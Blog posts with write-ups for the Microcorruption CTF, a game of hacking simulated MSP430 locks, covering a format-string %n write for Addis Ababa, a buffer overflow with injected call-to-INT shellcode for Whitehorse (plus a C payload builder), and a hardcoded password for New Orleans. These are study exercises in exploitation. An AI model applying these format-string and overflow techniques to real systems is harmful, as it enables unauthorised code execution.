Saturday, January 30, 2016

Microcorruption CTF (III)

New episode of this fun CTF! microcorruption

11 - Addis Ababa

There is no login function; everything happens in main, so we cannot smash the stack to control the execution. Our attack point is at 447C: there is a call to printf whose format string is our input, so we can mount a format string attack. Looking at the instructions just before the call, we see that when printf is called, SP+2 holds the flag returned by test_password_valid, so we need a way to modify it. Reading the specification of this printf, the "%n" token takes its argument as an address and writes there the number of characters printed so far. Let's take a closer look at the stack:

  • SP+0: address of the format string (=SP+4)
  • SP+2: flag (=0x00)
  • SP+4: format string (=our input)
Here is our input:
                    address of SP+2 (2 bytes, little endian) + %x%n

When printf is called, it first prints the two bytes of the address as ordinary characters, then it parses %x, which consumes the first argument at SP+2 (the flag, 0x00), and finally, parsing %n, it takes the next argument, the word at SP+4, which is the address we placed at the start of our input, and writes the number of characters printed so far there, i.e. into the flag at SP+2. The exact count does not matter as long as it is non-zero, and it is at least 2 because the two address bytes have already been printed.

Microcorruption CTF (II)

Here is a new round of pretty lock hacks! microcorruption

6 - Whitehorse

The basic idea is the same as in Cusco: we still have the same buffer overflow, but this time the function unlock_door is not present, so we have to build it ourselves. What that function did was simply call INT with the value 0x7f on the stack. We forge our input as follows:

           call INT (4 bytes) + 12 random bytes + address of the beginning of the input + 7f00

How does this work? When the last ret is executed, the address of the beginning of the input is popped from the stack, so SP now points to the bytes 7f 00 (the word 0x007f in little endian) and PC is set to the value that was just popped, meaning that we jump to our call instruction. Now everything is set: we have our 0x7f on the stack and we are about to call INT.
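The following added example (not the original post's code) builds that input byte by byte so the layout is unambiguous: the MSP430 "call #imm" encoding (opcode word 0x12b0 followed by the immediate, both little endian), the filler up to the saved return address, the address of the start of the input, and the 0x007f word that INT will find on the stack. The buffer address 0x3000, the INT address 0x4500 and the 16-byte distance to the return address are placeholders; read the real ones off the debugger for this lock.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

static void put16(uint8_t *p, uint16_t v) {
    p[0] = (uint8_t)(v & 0xff);          /* MSP430 is little endian */
    p[1] = (uint8_t)(v >> 8);
}

/* Build the Whitehorse input described above:
 *   call #INT (4 bytes) | filler up to the saved return address |
 *   address of the start of the input | 0x007f (INT's argument)
 * "call #imm" is opcode word 0x12b0 followed by the immediate.
 * buf_addr: stack address where our input starts (read it off the debugger)
 * ret_off:  bytes from the start of the input to the saved return address
 * int_addr: address of INT in this lock's firmware
 * Returns the payload length, or 0 if the call would not fit before ret_off
 * or the whole payload would not fit in cap bytes. */
static size_t build_payload(uint8_t *out, size_t cap, uint16_t buf_addr,
                            size_t ret_off, uint16_t int_addr) {
    if (ret_off < 4 || ret_off + 4 > cap) return 0;
    size_t n = 0;
    put16(out + n, 0x12b0); n += 2;      /* call #int_addr ...            */
    put16(out + n, int_addr); n += 2;    /* ... runs once PC is redirected */
    while (n < ret_off) out[n++] = 0x41; /* filler; any value works       */
    put16(out + n, buf_addr); n += 2;    /* popped by ret into PC         */
    put16(out + n, 0x007f); n += 2;      /* at SP when our call executes  */
    return n;
}

/* Render the bytes as the hex string the Microcorruption console accepts. */
static void to_hex(const uint8_t *p, size_t n, char *out) {
    static const char digits[] = "0123456789abcdef";
    for (size_t i = 0; i < n; i++) {
        out[2 * i] = digits[p[i] >> 4];
        out[2 * i + 1] = digits[p[i] & 0xf];
    }
    out[2 * n] = 0;
}

int main(void) {
    uint8_t payload[64];
    char hex[2 * sizeof payload + 1];
    /* Hypothetical addresses and offset: substitute the ones you observe. */
    size_t n = build_payload(payload, sizeof payload, 0x3000, 16, 0x4500);
    to_hex(payload, n, hex);
    printf("%zu bytes: %s\n", n, hex);
    return 0;
}
```

With the write-up's layout (4 + 12 + 2 + 2) the payload is 20 bytes; the only parts that must be exact are the first four (the call), the two at the return-address offset (where the overwritten PC comes from) and the last two (the word ret leaves at SP).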

Microcorruption CTF (I)

Microcorruption hosts a nice reverse engineering CTF game, based on the MSP430 microcontroller.

Just a note: I will write just a simple draft of the solutions, which I hope will be enough to guide you through the exercises without spoiling the fun.
If a more detailed analysis is what you want, let me know in the comments section.

OK, let's wear our "i <3 asm" T-shirt and we are ready to go!

0 - Tutorial

Just follow the instructions :)

1 - New Orleans

The lock asks for a password. Looking at the assembly we can easily find the check_password procedure. We break at its beginning and inspect it a bit to find that it compares the given password to a hardcoded one (starting at location 0x2400).